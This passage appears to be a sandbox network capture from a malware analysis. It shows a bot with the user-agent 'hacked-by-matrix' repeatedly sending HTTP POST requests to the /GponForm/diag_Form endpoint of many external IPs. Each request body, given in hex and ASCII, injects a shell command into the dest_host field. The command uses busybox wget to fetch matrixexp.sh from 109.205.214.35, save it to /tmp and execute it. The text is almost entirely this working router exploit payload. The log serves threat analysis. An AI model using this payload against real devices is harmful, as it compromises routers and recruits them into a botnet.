                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1200192.168.2.133398442.52.191.183443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713598013 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1201192.168.2.1347942118.50.14.66443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713609934 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1202192.168.2.1336266109.9.183.157443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713655949 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1203192.168.2.1343794109.135.70.33443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713670969 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1204192.168.2.1334970109.107.87.14443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713682890 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1205192.168.2.1345066118.187.162.106443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713704109 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1206192.168.2.1350848212.235.130.50443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713754892 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1207192.168.2.1340930109.24.176.113443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713778019 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1208192.168.2.1348874212.22.84.232443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713788033 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1209192.168.2.133668642.216.168.140443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713819027 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1210192.168.2.1349366109.143.208.24443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713833094 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1211192.168.2.135318442.212.248.144443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713877916 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1212192.168.2.1360066212.80.36.68443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713906050 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1213192.168.2.134798042.123.238.35443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713918924 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1214192.168.2.1333584109.199.104.34443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713947058 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1215192.168.2.1351550118.146.104.107443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713977098 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1216192.168.2.1340398109.204.144.163443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714023113 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1217192.168.2.13362565.8.244.18443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714027882 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1218192.168.2.135839642.112.41.105443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714060068 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1219192.168.2.1348758118.43.134.111443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714082003 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1220192.168.2.1351214109.252.0.48443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714102030 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1221192.168.2.134119042.49.177.7443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714128971 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1222192.168.2.13543785.56.227.146443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.714137077 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
